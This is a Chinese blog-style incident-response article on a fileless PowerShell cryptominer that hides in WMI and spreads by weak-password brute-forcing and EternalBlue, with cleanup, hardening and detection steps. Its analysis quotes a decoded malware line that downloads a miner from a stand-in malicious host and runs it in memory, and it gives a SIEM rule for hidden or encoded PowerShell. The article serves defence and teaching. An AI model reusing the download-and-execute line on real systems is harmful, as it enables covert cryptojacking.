当前位置：首页 > article >正文

剖析Powershell挖矿病毒：从WMI驻留到永恒之蓝横向移动的攻防实战

article 2026/4/17 21:52:11

1. 初识Powershell挖矿病毒当服务器CPU突然飙高时那天早上刚到公司运维同事小李就急匆匆跑过来张哥咱们三台Web服务器CPU直接冲到100%了用户投诉页面卡成PPT我连咖啡都没来得及喝就冲进机房打开任务管理器一看——好家伙十几个Powershell.exe进程把CPU资源吃得干干净净。这场景太经典了基本可以确定是遇到了Powershell挖矿病毒。这种病毒最近在企业网里特别猖獗它最恶心的地方在于采用了无文件攻击技术。传统病毒好歹能在硬盘上找到.exe文件而这个家伙直接把恶意代码塞进WMIWindows管理规范的数据库里。每次开机系统都会自动从WMI里加载并执行这些加密的恶意脚本就像有个隐形人天天往你电脑里塞小纸条。更麻烦的是它的双重传播机制一方面通过WMIExec爆破弱密码另一方面利用永恒之蓝漏洞MS17-010在局域网里自动扩散。我见过最夸张的案例某公司财务部一台电脑中招两小时后整个楼层的服务器全部沦陷。病毒作者显然深谙不要把鸡蛋放在一个篮子里的道理给病毒上了双保险。2. 病毒解剖课WMI里的暗箱操作2.1 WMI成了病毒的温床用wbemtest工具连接root\Default命名空间时我发现了病毒创建的恶意类。早期版本会伪装成Win32_Services后来变种改成了System_Anti_Virus_Core这种极具迷惑性的名字——这就像小偷在自家门口挂了个公安局的牌子。双击打开这个类里面是经过Base64编码的Powershell脚本。用在线解码工具还原后能看到典型的挖矿代码特征$miner New-Object Net.WebClient $miner.DownloadString(http://malicious.site/xmrig) | Invoke-Expression这段代码会从攻击者控制的服务器下载门罗币挖矿程序然后直接在内存中运行根本不会在磁盘留下可执行文件。2.2 病毒的自保机制病毒在本地安全策略里创建IPSec规则这个操作特别鸡贼。它会封堵本机的445端口看似在防护永恒之蓝漏洞实际是为了阻止其他病毒来抢地盘——就像黑帮划地盘时在边界拉警戒线。通过这条命令可以查看被篡改的策略netsh ipsec static show all3. 实战清除与病毒的近身肉搏3.1 紧急止血措施首先得用雷霆手段结束Powershell进程否则服务器根本动不了。但直接点结束进程是没用的病毒设置了守护机制。我习惯用组合拳taskkill /f /im powershell.exe wmic process where namepowershell.exe delete注意这只能争取1-2小时的操作时间就像给大出血的病人扎止血带必须抓紧时间做后续处理。3.2 挖出WMI里的定时炸弹清理WMI需要特别小心就像拆弹时剪错电线会引发二次爆炸。正确的操作流程是打开wbemtest连接root\Default右键可疑类选择删除用命令行彻底清理残留wmic /namespace:\\root\default path __EventFilter delete wmic /namespace:\\root\default path CommandLineEventConsumer delete4. 防御体系建设让病毒无处可藏4.1 系统加固三板斧第一招是关闭WMI的远程执行功能就像给后门上锁reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRM\Service /v WinRMCompatibility /t REG_DWORD /d 0 /f第二招必须打上MS17-010补丁我见过太多企业因为觉得内网很安全而吃大亏。第三招是在防火墙上设置445端口的访问控制这是阻断病毒横向移动的关键。4.2 高级狩猎技巧在SIEM系统里设置这个检测规则特别有效SELECT * FROM WinEvent WHERE EventID4688 AND (CommandLine LIKE % -nop -w hidden -c % OR CommandLine LIKE %EncodedCommand%)这个规则专门抓Powershell的典型恶意参数组合去年帮我们提前发现了三起入侵事件。5. 血的教训那些年我们踩过的坑有次给某制造业客户做应急响应发现他们所有服务器都中了挖矿病毒。排查发现是运维在用的一台跳板机密码是Admin123被病毒用WMIExec轻松爆破。更离谱的是他们的域控制器居然没打永恒之蓝补丁导致病毒像野火般蔓延。后来我们做了个实验在内网放了一台没打补丁的Win7电脑2分17秒后就被攻陷。这个数据现在成了我给客户做安全培训时的必讲案例——攻击者的速度永远比你想象得快。现在每次给企业做安全评估我第一件事就是检查WMI和SMB配置。安全运维就像刷牙不能等到牙疼才想起要做。那些觉得我们数据不值钱不会被盯上的企业最后都成了攻击者的免费矿场。

剖析Powershell挖矿病毒：从WMI驻留到永恒之蓝横向移动的攻防实战

相关文章：

剖析Powershell挖矿病毒：从WMI驻留到永恒之蓝横向移动的攻防实战

ELK Stack实战：构建高效企业日志分析平台

深入解析ToTensor()：从PIL到OpenCV的图像预处理最佳实践

扩散模型 vs GAN：哪个更适合你的图像生成任务？（含对比实验）

关于缩微组别疯狂电路赛题T2计分规则的建议

SpringBoot集成PowerJob实战：从零构建高可靠分布式任务调度平台

从CAN到CANFD：一文搞懂协议差异、电平实测与车载网络升级实战

Dematel法实战：从关系矩阵到要素权重的系统影响力解码

自媒体增长引擎中内容量化成垂直领域知识库的思考

告别瞎摸索！Blender高效建模必装的7个神仙插件及一键配置脚本

Apollo自定义场景（scenarios）并仿真

深度解析BlockTheSpot：Spotify桌面端广告拦截的终极解决方案

如何用Bebas Neue开源字体打造专业级标题设计：5大优势与完整应用指南

终极指南：使用Jsxer快速解密Adobe JSXBIN文件

TrollInstallerX深度解密：iOS 14-16.6.1 TrollStore安装技术全解

HsMod：基于BepInEx的炉石传说功能增强插件完全指南

别再为数据采集发愁了！用这个桥接器，5分钟搞定三菱FX3U PLC的ModbusTCP通讯

别再只会用%和_了！MySQL模糊查询的三种隐藏技巧，性能提升不止一点点

为什么你的Copilot总在破坏ESLint规则？揭秘3层风格一致性断点——语法层、语义层、团队心智层

嵌入式设备电池电量精准检测：从ADC采样误差到动态校准实践

MicroPython中断处理实战：如何避免内存分配陷阱（附代码示例）

别再让Simulink-PS Converter报错！手把手教你搞定物理信号转换的滤波与单位设置

基于VSCode+PlatformIO+SDCC的51单片机PWM调光实战（STC89C52RC）

图解车联网通信：从端到云的系统架构与关键技术全景解析

基于STM32与光敏传感器的智能窗帘Proteus仿真及Keil实现

【智能代码生成实战权威指南】：长代码场景下3大致命缺陷与7步修复框架

爆火收藏｜大模型入门保姆级指南，小白程序员必看，零踩坑不焦虑，快速上手不内耗

计算机系统基础知识（十七）：软件篇之系统工程详解（上篇）

【SITS2026官方性能白皮书精要】：AI模型推理延迟降低47%的7个硬核优化路径

BUFR描述符表模板系统源码解读